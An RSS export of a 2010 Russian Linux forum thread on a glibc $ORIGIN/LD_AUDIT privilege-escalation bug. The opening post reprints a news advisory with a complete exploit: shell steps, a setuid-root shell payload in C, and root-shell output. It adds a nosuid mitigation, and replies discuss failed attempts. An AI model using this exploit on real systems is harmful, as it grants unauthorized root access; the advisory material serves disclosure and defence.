<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0"
					xmlns:content="http://purl.org/rss/1.0/modules/content/"
					xmlns:wfw="http://wellformedweb.org/CommentAPI/"
					xmlns:atom="http://www.w3.org/2005/Atom"
				  >
<channel>
<atom:link rel="self"  type="application/rss+xml"  href="http://rulinux.net/rss_from_sect_4_subsect_10_thread_30931"  />
<title>rulinux.net - Форум - Talks - [решето]  В Glibc обнаружена серьезная уязвимость </title>
<link>http://rulinux.net/</link>
<description><![CDATA[Портал о GNU/Linux и не только]]></description>
<image><title>rulinux.net - Форум - Talks - [решето]  В Glibc обнаружена серьезная уязвимость </title>
<link>http://rulinux.net/</link>
<url>http://rulinux.net/rss_icon.png</url>
</image>
<item>
<title>Re: [решето]  В Glibc обнаружена серьезная уязвимость </title>
<link>https://rulinux.net/message.php?newsid=30931&amp;page=1#69026</link>
<guid>https://rulinux.net/message.php?newsid=30931&amp;page=1#69026</guid>
<pubDate>Wed, 20 Oct 2010 09:47:37 +0400</pubDate>
<description><![CDATA[<p>Ну, там несколько препятствий. Т.е. во-первых, не у всех /tmp находится на том же устройстве, что и /, так что hardlink /bin/ping -> /tmp/exploit/target уже проблематичен. Кроме того, на устройстве, куда смонтировано /tmp вообще может быть снят бит исполняемости. И в последнюю очередь эта ошибка (я её тоже видел, но не понял откуда она берется) с Permission denied, возникающая в башах (в зависимости от версии баша, что-ли?). Но это не помешает Мелкософту отрапортовать, что за истекшей период было обнаружено столько-то ошибок в Линупсах.</p>]]></description>
</item>
<item>
<title>Re: [решето]  В Glibc обнаружена серьезная уязвимость </title>
<link>https://rulinux.net/message.php?newsid=30931&amp;page=1#69025</link>
<guid>https://rulinux.net/message.php?newsid=30931&amp;page=1#69025</guid>
<pubDate>Wed, 20 Oct 2010 08:57:56 +0400</pubDate>
<description><![CDATA[<p><fieldset style="border: 1px dashed black; padding:0px;"><ol style="background-color:#3d3d3d;" start="1"><li style="background-color:#000000; padding-left: 5px; color: gray">&nbsp;exec 3< /tmp/exploit/target<li style="background-color:#000000; padding-left: 5px; color: gray">&nbsp;bash: /tmp/exploit/target: Отказано в доступе<li style="background-color:#000000; padding-left: 5px; color: gray">&nbsp;</ol></fieldset></p><p>не работает, как обычно.</p>]]></description>
</item>
<item>
<title>Re: [решето]  В Glibc обнаружена серьезная уязвимость </title>
<link>https://rulinux.net/message.php?newsid=30931&amp;page=1#69024</link>
<guid>https://rulinux.net/message.php?newsid=30931&amp;page=1#69024</guid>
<pubDate>Wed, 20 Oct 2010 08:32:51 +0400</pubDate>
<description><![CDATA[<p>У меня венда ежедневно получает апдейты. Мне это не грозит?</p>]]></description>
</item>
<item>
<title>Re: [решето]  В Glibc обнаружена серьезная уязвимость </title>
<link>https://rulinux.net/message.php?newsid=30931&amp;page=1#69023</link>
<guid>https://rulinux.net/message.php?newsid=30931&amp;page=1#69023</guid>
<pubDate>Wed, 20 Oct 2010 08:25:22 +0400</pubDate>
<description><![CDATA[<p>Боян, вчера уже обсудили, вот вам новая дырочка, подвержены _все_ ядра новее 2.6.30:</p><p>&nbsp;<a href="http://www.exploit-db.com/exploits/15285/">http://www.exploit-db.com/exploits/15285/</a></p>]]></description>
</item>
<item>
<title>Re: [решето]  В Glibc обнаружена серьезная уязвимость </title>
<link>https://rulinux.net/message.php?newsid=30931&amp;page=1#69022</link>
<guid>https://rulinux.net/message.php?newsid=30931&amp;page=1#69022</guid>
<pubDate>Wed, 20 Oct 2010 08:25:17 +0400</pubDate>
<description><![CDATA[<p>Новость на главной. Не оно? :)</p>]]></description>
</item>
<item>
<title>[решето]  В Glibc обнаружена серьезная уязвимость </title>
<link>https://rulinux.net/message.php?newsid=30931&amp;page=1#69021</link>
<guid>https://rulinux.net/message.php?newsid=30931&amp;page=1#69021</guid>
<pubDate>Wed, 20 Oct 2010 08:12:00 +0400</pubDate>
<description><![CDATA[<p>&nbsp;<a href="http://www.opennet.ru/opennews/art.shtml?num=28338">http://www.opennet.ru/opennews/art.shtml?num=28338</a></p><p>В системной библиотеке GNU C Library (glibc), являющейся основой большинства Linux-дистрибутивов, обнаружена критическая уязвимость, позволяющая любому локальному пользователю получить привилегии суперпользователя. Проблема вызвана игнорированием в Glibc требования спецификации ELF по запрещению использования текущего пути к исполняемому файлу ($ORIGIN) в процессе динамического связывания программ с идентификатором смены владельца или группы (suid/sgid). Проблема проявляется в конфигурациях, в которых пользователь имеет возможность создавать жесткие ссылки в файловой системе, допускающей наличие suid-файлов.</p><p>Уязвимость протестирована в Fedora 13 и RHEL 5 / CentOS 5, другие дистрибутивы судя по всему также подвержены проблеме. Исправления пока недоступны, статус выхода обновлений в различных Linux-дистрибутивах можно наблюдать на следующих страницах: Slackware, Gentoo, Mandriva, openSUSE, CentOS, Fedora, RHEL, Debian, Ubuntu.</p><p>Проблема была известна и ранее, но разработчики Glibc считали, что эксплуатировать ее невозможно. Используя режим аудита связывания программ (LD_AUDIT) в ld.so, вкупе с подменой $ORIGIN через создание жесткой ссылки и запуском suid-программы через файловый дескриптор, удалось разработать практический метод атаки. Проверить свою систему на наличие уязвимости можно следующим способом:</p><p></p><p>Создаем произвольную директорию:</p><p>   $ mkdir /tmp/exploit</p><p>Привязываем suid-программу жесткой ссылкой в созданную директорию (при выполнении будет изменен $ORIGIN):</p><p>   $ ln /bin/ping /tmp/exploit/target</p><p>Открываем для исполняемого файла файловый дескриптор:</p><p>   $ exec 3< /tmp/exploit/target</p><p>Данный файловый дескриптор должен быть виден в пространстве /proc</p><p>   $ ls -l /proc/$$/fd/3    lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target*</p><p>Удаляем ранее созданную директорию</p><p>   $ rm -rf /tmp/exploit/</p><p>В /proc дескриптор остался, но теперь помечен как удаленный:</p><p>   $ ls -l /proc/$$/fd/3    lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted)</p><p>Заменяем директорию на специально созданный эксплоит (имя директории будет открыто через dlopen):</p><p>   $ cat > payload.c    void __attribute__((constructor)) init()    {        setuid(0);        system("/bin/bash");    }    ^D</p><p>   $ gcc -w -fPIC -shared -o /tmp/exploit payload.c    $ ls -l /tmp/exploit    -rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*</p><p>Инициируем динамическое связывание и загрузку $ORIGIN через LD_AUDIT и запуск программы по файловому дескриптору в /proc        $ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3    sh-4.1# whoami    root    sh-4.1# id    uid=0(root) gid=500(taviso)</p><p> В качестве временной меры защиты рекомендуются перемонтировать все доступные сторонним пользователям на запись директории в режиме nosuid (актуально только если suid-файл и доступная на запись директория присутствуют в одном дисковом разделе, например, /tmp или /home являются частью корневого раздела, так как жесткая ссылка не может быть установлена из одного дискового раздела в другой) :</p><p>    # mount -o bind /tmp /tmp    # mount -o remount,bind,nosuid /tmp /tmp</p><p>Дополнение: Разработчики из компании Red Hat выпустили патч, устраняющий проблему в Glibc. </p>]]></description>
</item>
</channel>
</rss>